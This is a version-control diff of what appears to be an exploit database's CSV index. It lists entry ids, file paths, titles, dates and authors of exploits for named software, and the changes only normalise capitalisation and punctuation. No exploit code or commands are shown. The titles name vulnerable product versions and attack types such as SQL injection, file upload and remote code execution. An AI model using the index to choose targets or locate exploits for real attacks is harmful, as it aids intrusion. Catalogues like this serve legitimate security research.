Download Trick",2012-05-31,"Michal Zalewski",multiple,local,0 -18960,platforms/php/webapps/18960.txt,"NewsAdd <= 1.0 (lerNoticia.php id) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 -18961,platforms/php/webapps/18961.txt,"Supernews <= 2.6.1 (noticias.php cat) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 +18960,platforms/php/webapps/18960.txt,"NewsAdd <= 1.0 - (lerNoticia.php id) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 +18961,platforms/php/webapps/18961.txt,"Supernews <= 2.6.1 - (noticias.php cat) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 18962,platforms/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,windows,dos,0 -18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 -18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 +18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 +18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 18970,platforms/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0 18965,platforms/php/webapps/18965.html,"4psa voipnow professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 -18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 +18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,Metasploit,windows,remote,0 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 -18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,metasploit,windows,remote,0 +18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,Metasploit,windows,remote,0 18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 18987,platforms/php/webapps/18987.php,"WordPress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 @@ -16410,10 +16410,10 @@ id,file,description,date,author,platform,type,port 18989,platforms/php/webapps/18989.php,"WordPress Google Maps via Store Locator Plugin 2.7.1 < 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 18990,platforms/php/webapps/18990.php,"WordPress HTML5 AV Manager Plugin 0.2.7 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18991,platforms/php/webapps/18991.php,"WordPress Foxypress Plugin 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer Multiple ActiveX BackupToAvi() Remote Overflow",2012-06-08,metasploit,windows,remote,0 +19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer Multiple ActiveX BackupToAvi() Remote Overflow",2012-06-08,Metasploit,windows,remote,0 18993,platforms/php/webapps/18993.php,"WordPress Asset Manager Plugin 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18994,platforms/php/webapps/18994.php,"WordPress Font Uploader Plugin 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 -19026,platforms/windows/remote/19026.rb,"Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,metasploit,windows,remote,0 +19026,platforms/windows/remote/19026.rb,"Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,Metasploit,windows,remote,0 18997,platforms/php/webapps/18997.php,"WordPress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18998,platforms/php/webapps/18998.php,"WordPress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18999,platforms/php/webapps/18999.php,"SN News <= 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 @@ -16422,10 +16422,10 @@ id,file,description,date,author,platform,type,port 19013,platforms/php/webapps/19013.txt,"WordPress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19005,platforms/php/webapps/19005.txt,"SN News <= 1.2 - (/admin/loger.php) Admin Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - (.PAC) Exploit",2012-06-07,b33f,windows,local,0 -19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,metasploit,windows,remote,0 +19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,Metasploit,windows,remote,0 19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Stored XSS",2012-06-06,"Henry Hoggard",php,webapps,0 -19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory Remote Code Execution",2012-06-10,metasploit,windows,remote,0 -19007,platforms/php/webapps/19007.php,"PHPNet <= 1.8 (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 +19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory Remote Code Execution",2012-06-10,Metasploit,windows,remote,0 +19007,platforms/php/webapps/19007.php,"PHPNet <= 1.8 - (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 19008,platforms/php/webapps/19008.php,"WordPress Front End Upload 0.5.3 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 19009,platforms/php/webapps/19009.php,"WordPress Omni Secure Files Plugin 0.1.13 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 19016,platforms/php/webapps/19016.txt,"WordPress PICA Photo Gallery Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 @@ -16443,13 +16443,13 @@ id,file,description,date,author,platform,type,port 19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0 19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0 19036,platforms/php/webapps/19036.php,"WordPress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 -19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)",2012-06-11,metasploit,windows,local,0 -19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 - Arbitrary PHP File Upload",2012-06-10,metasploit,php,webapps,0 +19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)",2012-06-11,Metasploit,windows,local,0 +19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 - Arbitrary PHP File Upload",2012-06-10,Metasploit,php,webapps,0 19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd Buffer Overflow",1988-10-01,anonymous,bsd,remote,0 19040,platforms/solaris/remote/19040.txt,"SunView (SunOS <= 4.1.1) selection_svc",1990-08-14,"Peter Shipley",solaris,remote,0 -19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 /usr/bin/chroot",1991-05-01,anonymous,aix,dos,0 -19042,platforms/solaris/dos/19042.txt,"SunOS <= 4.1.1 /usr/release/bin/makeinstall",1999-11-23,anonymous,solaris,dos,0 -19043,platforms/aix/dos/19043.txt,"SunOS <= 4.1.1 /usr/release/bin/winstall",1999-11-12,anonymous,aix,dos,0 +19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 - /usr/bin/chroot",1991-05-01,anonymous,aix,dos,0 +19042,platforms/solaris/dos/19042.txt,"SunOS <= 4.1.1 - /usr/release/bin/makeinstall",1999-11-23,anonymous,solaris,dos,0 +19043,platforms/aix/dos/19043.txt,"SunOS <= 4.1.1 - /usr/release/bin/winstall",1999-11-12,anonymous,aix,dos,0 19044,platforms/solaris/remote/19044.txt,"SunOS <= 4.1.3 LD_LIBRARY_PATH and LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0 19045,platforms/aix/dos/19045.txt,"SunOS <= 4.1.3 - kmem setgid /etc/crash",1993-02-03,anonymous,aix,dos,0 19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos,0 @@ -16470,12 +16470,12 @@ id,file,description,date,author,platform,type,port 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE",1996-04-05,"Arthur Hagen",irix,local,0 19067,platforms/irix/local/19067.txt,"SGI IRIX <= 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT",1996-11-22,"Yuri Volobuev",irix,local,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Remote Root Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0 -19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",2012-06-12,metasploit,php,webapps,0 +19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",2012-06-12,Metasploit,php,webapps,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File",1998-04-06,"ru5ty and SoReN",unix,local,0 19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote,0 19070,platforms/linux/local/19070.txt,"Slackware Linux 3.4 - liloconfig-color temporary file",1998-04-06,neonhaze,linux,local,0 19071,platforms/linux/local/19071.txt,"Slackware Linux 3.4 - makebootdisk temporary file",1998-04-06,neonhaze,linux,local,0 -19072,platforms/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B named SIGINT and SIGIOT symlink",1998-04-10,"Joe H",linux,local,0 +19072,platforms/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B - named SIGINT and SIGIOT symlink",1998-04-10,"Joe H",linux,local,0 19073,platforms/linux/local/19073.txt,"Slackware Linux 3.4 - netconfig temporary file",1998-04-06,neonhaze,linux,local,0 19074,platforms/linux/local/19074.txt,"Slackware Linux 3.4 - pkgtool temporary file",1998-04-06,neonhaze,linux,local,0 19075,platforms/linux/dos/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service",1998-04-10,Schlossnagle,linux,dos,0 @@ -16500,8 +16500,8 @@ id,file,description,date,author,platform,type,port 19096,platforms/linux/remote/19096.c,"RedHat Linux <= 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0 19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 -19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure",2012-06-13,metasploit,hardware,remote,0 -19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress uploadify.php - Arbitrary Code Execution",2012-06-13,metasploit,php,webapps,0 +19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure",2012-06-13,Metasploit,hardware,remote,0 +19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress uploadify.php - Arbitrary Code Execution",2012-06-13,Metasploit,php,webapps,0 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris <= 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris <= 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0 19103,platforms/linux/remote/19103.c,"HP HP-UX <= 10.34_ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3",1997-11-13,"G P R",linux,remote,0 @@ -16539,7 +16539,7 @@ id,file,description,date,author,platform,type,port 19137,platforms/hardware/dos/19137.rb,"Wyse - Machine Remote Power off (DOS) without any privilege",2012-06-14,it.solunium,hardware,dos,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 Memory Corruption Exploit",2012-06-14,"Felipe Andres Manzano",multiple,local,0 -19141,platforms/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,metasploit,windows,remote,0 +19141,platforms/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,Metasploit,windows,remote,0 19142,platforms/linux/local/19142.sh,"Oracle 8 File Access Vulnerabilities",1999-05-06,"Kevin Wenchel",linux,local,0 19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001'",1999-01-07,"Richard M. Smith",windows,local,0 19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 and Office97 Backdoor",1999-01-07,"Satu Laksela",windows,local,0 @@ -16548,9 +16548,9 @@ id,file,description,date,author,platform,type,port 19147,platforms/windows/remote/19147.txt,"NT IIS4 - Remote Web-Based Administration",1999-01-14,Mnemonix,windows,remote,0 19149,platforms/windows/remote/19149.c,"NT IIS4 Log Avoidance",1999-01-22,Mnemonix,windows,remote,0 19152,platforms/windows/remote/19152.txt,"Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory",1999-01-26,Mnemonix,windows,remote,0 -19387,platforms/windows/remote/19387.rb,"Apple iTunes 10 Extended M3U Stack Buffer Overflow",2012-06-25,metasploit,windows,remote,0 +19387,platforms/windows/remote/19387.rb,"Apple iTunes 10 Extended M3U Stack Buffer Overflow",2012-06-25,Metasploit,windows,remote,0 19156,platforms/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 Invalid Byte Cross-Frame Access",1999-01-28,"Georgi Guninski",windows,remote,0 -19413,platforms/windows/dos/19413.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 (1)",1999-07-03,Coolio,windows,dos,0 +19413,platforms/windows/dos/19413.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 - (1)",1999-07-03,Coolio,windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19158,platforms/solaris/local/19158.c,"Sun Solaris <= 2.5.1 PAM & unix_scheme",1997-02-25,"Cristian Schipor",solaris,local,0 @@ -16565,9 +16565,9 @@ id,file,description,date,author,platform,type,port 19172,platforms/unix/local/19172.c,"BSD/OS 2.1_DG/UX <= 7.0_Debian Linux <= 1.3_HP-UX <= 10.34_IBM AIX <= 4.2_SGI IRIX <= 6.4_Solaris <= 2.5.1 - xlock (1)",1997-04-26,cesaro,unix,local,0 19173,platforms/unix/local/19173.c,"BSD/OS 2.1_DG/UX <= 7.0_Debian Linux <= 1.3_HP-UX <= 10.34_IBM AIX <= 4.2_SGI IRIX <= 6.4_Solaris <= 2.5.1 - xlock (2)",1997-04-26,BeastMaster,unix,local,0 19174,platforms/php/webapps/19174.py,"Useresponse <= 1.0.2 - Privilege Escalation & RCE Exploit",2012-06-15,mr_me,php,webapps,0 -19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",2012-06-17,metasploit,windows,local,0 -19176,platforms/windows/local/19176.rb,"TFM MMPlayer (m3u/ppl File) Buffer Overflow",2012-06-15,metasploit,windows,local,0 -19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4)",2012-06-15,metasploit,windows,remote,0 +19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",2012-06-17,Metasploit,windows,local,0 +19176,platforms/windows/local/19176.rb,"TFM MMPlayer (m3u/ppl File) Buffer Overflow",2012-06-15,Metasploit,windows,local,0 +19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4)",2012-06-15,Metasploit,windows,remote,0 19178,platforms/php/webapps/19178.txt,"webo site speedup <= 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0 19179,platforms/php/webapps/19179.txt,"PHP Decoda 3.3.1 - Local File Inclusion",2012-06-16,"Number 7",php,webapps,0 19180,platforms/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilites",2012-06-16,Vulnerability-Lab,php,webapps,0 @@ -16576,7 +16576,7 @@ id,file,description,date,author,platform,type,port 19183,platforms/windows/dos/19183.txt,"XnView FlashPix Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 19184,platforms/windows/dos/19184.pl,"Karafun Player 1.20.86 - (.m3u) Crash PoC",2012-06-16,Styxosaurus,windows,dos,0 19185,platforms/hardware/webapps/19185.txt,"Huawei HG866 - Authentication Bypass",2012-06-16,hkm,hardware,webapps,0 -19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services MSXML Uninitialized Memory Corruption",2012-06-16,metasploit,windows,remote,0 +19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services MSXML Uninitialized Memory Corruption",2012-06-16,Metasploit,windows,remote,0 19187,platforms/php/webapps/19187.txt,"WordPress Automatic Plugin 2.0.3 - SQL Injection",2012-06-16,nick58,php,webapps,0 19188,platforms/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,php,webapps,0 19189,platforms/php/webapps/19189.txt,"iScripts EasyCreate CMS 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,php,webapps,0 @@ -16620,7 +16620,7 @@ id,file,description,date,author,platform,type,port 19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0_Microsoft JET 3.5/3.5.1 Database Engine VBA",1999-05-25,"J. Abreu Junior",multiple,dos,0 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 19230,platforms/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service",1999-05-11,"Chris Radigan",multiple,dos,0 -19231,platforms/windows/remote/19231.rb,"PHP apache_request_headers Function Buffer Overflow",2012-06-17,metasploit,windows,remote,0 +19231,platforms/windows/remote/19231.rb,"PHP apache_request_headers Function Buffer Overflow",2012-06-17,Metasploit,windows,remote,0 19232,platforms/solaris/local/19232.txt,"SunOS <= 4.1.4 arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local,0 19233,platforms/solaris/local/19233.txt,"Solaris <= 7.0 aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,solaris,local,0 19234,platforms/solaris/local/19234.c,"Solaris <= 7.0 cancel",1999-03-05,"Josh A. Strickland",solaris,local,0 @@ -16649,7 +16649,7 @@ id,file,description,date,author,platform,type,port 19257,platforms/linux/local/19257.c,"X11R6 3.3.3 Symlink",1999-03-21,Stealthf0rk,linux,local,0 19258,platforms/solaris/local/19258.sh,"Sun Solaris <= 7.0 ff.core",1999-01-07,"John McDonald",solaris,local,0 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc Vulnerabilty",1999-02-03,xnec,linux,local,0 -19260,platforms/irix/local/19260.sh,"SGI IRIX <= 6.2 /usr/lib/netaddpr",1997-05-09,"Jaechul Choe",irix,local,0 +19260,platforms/irix/local/19260.sh,"SGI IRIX <= 6.2 - /usr/lib/netaddpr",1997-05-09,"Jaechul Choe",irix,local,0 19261,platforms/netbsd_x86/local/19261.txt,"NetBSD <= 1.3.2_SGI IRIX <= 6.5.1 at(1)",1998-06-27,Gutierrez,netbsd_x86,local,0 19262,platforms/irix/local/19262.txt,"SGI IRIX <= 6.2 cdplayer",1996-11-21,"Yuri Volobuev",irix,local,0 19263,platforms/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",hardware,webapps,0 @@ -16680,11 +16680,11 @@ id,file,description,date,author,platform,type,port 19288,platforms/windows/remote/19288.py,"HP Data Protector Client EXEC_CMD Remote Code Execution",2012-06-19,"Ben Turner",windows,remote,0 19289,platforms/windows/dos/19289.txt,"Samsung AllShare 2.1.1.0 - NULL Pointer Deference",2012-06-19,"Luigi Auriemma",windows,dos,0 19290,platforms/multiple/dos/19290.txt,"Airlock WAF 4.2.4 Overlong UTF-8 Sequence Bypass",2012-06-19,"SEC Consult",multiple,dos,0 -19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer <= 6.4.017 - Stack Buffer Overflow",2012-06-19,metasploit,windows,remote,0 +19291,platforms/windows/remote/19291.rb,"EZHomeTech EzServer <= 6.4.017 - Stack Buffer Overflow",2012-06-19,Metasploit,windows,remote,0 19292,platforms/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilites",2012-06-19,Vulnerability-Lab,php,webapps,0 19293,platforms/windows/local/19293.py,"Sysax <= 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",windows,local,0 19294,platforms/php/webapps/19294.txt,"WordPress Schreikasten 0.14.13 - XSS",2012-06-20,"Henry Hoggard",php,webapps,0 -19295,platforms/windows/remote/19295.rb,"Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",2012-06-20,metasploit,windows,remote,0 +19295,platforms/windows/remote/19295.rb,"Adobe Flash Player AVM Verification Logic Array Indexing Code Execution",2012-06-20,Metasploit,windows,remote,0 19601,platforms/windows/remote/19601.txt,"etype eserv 2.50 - Directory Traversal",1999-11-04,"Ussr Labs",windows,remote,0 19602,platforms/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",linux,local,0 19297,platforms/linux/remote/19297.c,"IBM Scalable POWERparallel (SP) 2.0 sdrd",1998-08-05,"Chuck Athey and Jim Garlick",linux,remote,0 @@ -16761,7 +16761,7 @@ id,file,description,date,author,platform,type,port 19365,platforms/netware/remote/19365.txt,"Novell Netware 4.1/4.11 SP5B NDS Default Rights",1999-04-09,"Simple Nomad",netware,remote,0 19384,platforms/linux/local/19384.c,"Debian Linux <= 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay",1999-06-15,"Robert Lister",multiple,dos,0 -19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,metasploit,windows,remote,0 +19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,Metasploit,windows,remote,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow Vulnerabilities",1999-06-25,KSR[T],linux,local,0 19371,platforms/linux/local/19371.c,"VMWare 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0 19372,platforms/windows/dos/19372.txt,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name",1999-06-28,"J D Glaser",windows,dos,0 @@ -16778,11 +16778,11 @@ id,file,description,date,author,platform,type,port 19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 employer-profile.asp SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 19398,platforms/php/webapps/19398.txt,"WordPress Fancy Gallery Plugin 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 19408,platforms/php/webapps/19408.txt,"Zend Framework Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 -19403,platforms/php/webapps/19403.rb,"SugarCRM <= 6.3.1 unserialize() PHP Code Execution",2012-06-26,metasploit,php,webapps,0 +19403,platforms/php/webapps/19403.rb,"SugarCRM <= 6.3.1 unserialize() PHP Code Execution",2012-06-26,Metasploit,php,webapps,0 29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service",2006-11-15,"Evgeny Legerov",windows,dos,0 19409,platforms/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0 -19414,platforms/windows/dos/19414.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 (2)",1999-07-03,klepto,windows,dos,0 -19415,platforms/windows/dos/19415.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 (3)",1999-04-06,"Rob Mosher",windows,dos,0 +19414,platforms/windows/dos/19414.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 - (2)",1999-07-03,klepto,windows,dos,0 +19415,platforms/windows/dos/19415.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 - (3)",1999-04-06,"Rob Mosher",windows,dos,0 19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server <= 3.6 SSL Buffer Overflow DoS",1999-07-06,"Arne Vidstrom",windows,dos,0 19417,platforms/osx/local/19417.txt,"Apple Mac OS <= 8 8.6 Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0 19418,platforms/aix/local/19418.txt,"IBM AIX <= 4.3.1 adb",1999-07-12,"GZ Apple",aix,local,0 @@ -16799,8 +16799,8 @@ id,file,description,date,author,platform,type,port 19429,platforms/linux/local/19429.sh,"Rational Software ClearCase for Unix 3.2 ClearCase SUID",1999-05-02,Mudge,linux,local,0 19430,platforms/multiple/local/19430.txt,"GNU groff 1.11 a_HP-UX 10.0/11.0_SGI IRIX <= 6.5.3 Malicious Manpage Vulnerabilities",1999-07-25,"Pawel Wilk",multiple,local,0 19431,platforms/php/webapps/19431.txt,"webERP <= 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,php,webapps,0 -19432,platforms/jsp/webapps/19432.rb,"Openfire <= 3.6.0a Admin Console Authentication Bypass",2012-06-28,metasploit,jsp,webapps,0 -19433,platforms/windows/local/19433.rb,"Apple QuickTime TeXML Stack Buffer Overflow",2012-06-28,metasploit,windows,local,0 +19432,platforms/jsp/webapps/19432.rb,"Openfire <= 3.6.0a Admin Console Authentication Bypass",2012-06-28,Metasploit,jsp,webapps,0 +19433,platforms/windows/local/19433.rb,"Apple QuickTime TeXML Stack Buffer Overflow",2012-06-28,Metasploit,windows,local,0 19434,platforms/osx/local/19434.txt,"Quinn 'the Eskimo' and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption",1999-07-28,"Dawid adix Adamski",osx,local,0 19435,platforms/windows/remote/19435.html,"Microsoft JET 3.5/3.51/4.0 VBA Shell",1999-07-29,BrootForce,windows,remote,0 19436,platforms/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 Table Saturation Denial of Service",1999-07-29,"Lance Spitzner",hardware,dos,0 @@ -16822,7 +16822,7 @@ id,file,description,date,author,platform,type,port 19452,platforms/php/webapps/19452.txt,"phpmoneybooks 1.03 - Stored XSS",2012-06-29,chap0,php,webapps,0 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local DoS",2012-06-29,0in,windows,dos,0 19455,platforms/windows/webapps/19455.txt,"specview <= 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi 